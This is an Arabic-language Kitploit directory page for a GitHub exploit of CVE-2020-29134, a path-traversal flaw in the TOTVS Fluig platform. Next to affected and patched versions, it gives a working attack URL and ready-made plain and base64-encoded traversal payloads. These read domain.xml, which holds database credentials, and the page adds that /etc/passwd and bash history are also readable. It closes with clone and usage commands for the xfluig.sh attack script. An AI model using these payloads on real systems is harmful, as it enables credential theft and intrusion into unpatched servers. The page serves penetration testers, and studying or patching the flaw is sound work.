Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-29134 — استغلال CVE-2020-29134 - TOTVS Fluig Platform - اجتياز المسار | Kitploit
أدوات/GitHubGitHub/ls4ss/cve-2020-29134
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubls4ss/cve-2020-29134

CVE-2020-29134

استغلال CVE-2020-29134 - TOTVS Fluig Platform - اجتياز المسار

عرض المستودع
31منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

منصة Totvs Fluig

root@kitploit:~
 Fluig هي منصة الإنتاجية والتعاون التي تتكامل مع نظام ERP،
 ومع أنظمة شركتك الأخرى لإحداث ثورة في طريقة عملك أنت وفريقك.

CVE-2020-29134

root@kitploit:~
 تسمح منصة TOTVS Fluig باجتياز المسار عبر معامل مُرمّز في base64.
 عند استغلالها، تتيح هذه الثغرة قراءة ملفات XML الحساسة التي تحتوي على
 بيانات للوصول إلى قاعدة البيانات، وفي بعض الحالات، اتصالات LDAP وتكاملات نظام ERP.
 بالإضافة إلى ذلك، من الممكن أيضًا استكشاف ملفات النظام، مثل /etc/passwd و /root/.bash_history
 

الإصدارات المتأثرة

root@kitploit:~
--
<== Fluig Lake 1.7.0
<== Fluig 1.6.5
<== Fluig 1.6.4
...

الإصدارات المُصحّحة

root@kitploit:~
<== Fluig Lake 1.7.0-210303 (تم التصحيح)
<== Fluig 1.6.5-210308 (تم التصحيح)
<== Fluig 1.6.4-210308 (تم التصحيح)

بناء الحمولة

alt text

متجه الهجوم

root@kitploit:~
 http://fluig.host.com/volume/stream/Rmx1aWc=/

اجتياز المسار بنص عادي

root@kitploit:~
 ?t=1&vol=Default&id=1&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml

اجتياز المسار بترميز base64

root@kitploit:~
 P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=

الحمولة

root@kitploit:~
 http://HOST.FLUIG.COM/volume/stream/Rmx1aWc=/P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
 

مرجع Exploit-DB

root@kitploit:~
 https://www.exploit-db.com/exploits/49622

 

استنساخ المستودع

root@kitploit:~
 # git clone https://github.com/lucxssouza/CVE-2020-29134.git
 # cd CVE-2020-29134
 # chmod +x xfluig.sh

الاستخدام

root@kitploit:~
 مثال 1: ./xfluig.sh http://fluig.host.com REQUESTS_WFUZZ (عدد الطلبات التي يولدها wfuzz)

 مثال 2: ./xfluig.sh http://fluig.host.com:PORT
تنزيل الأداة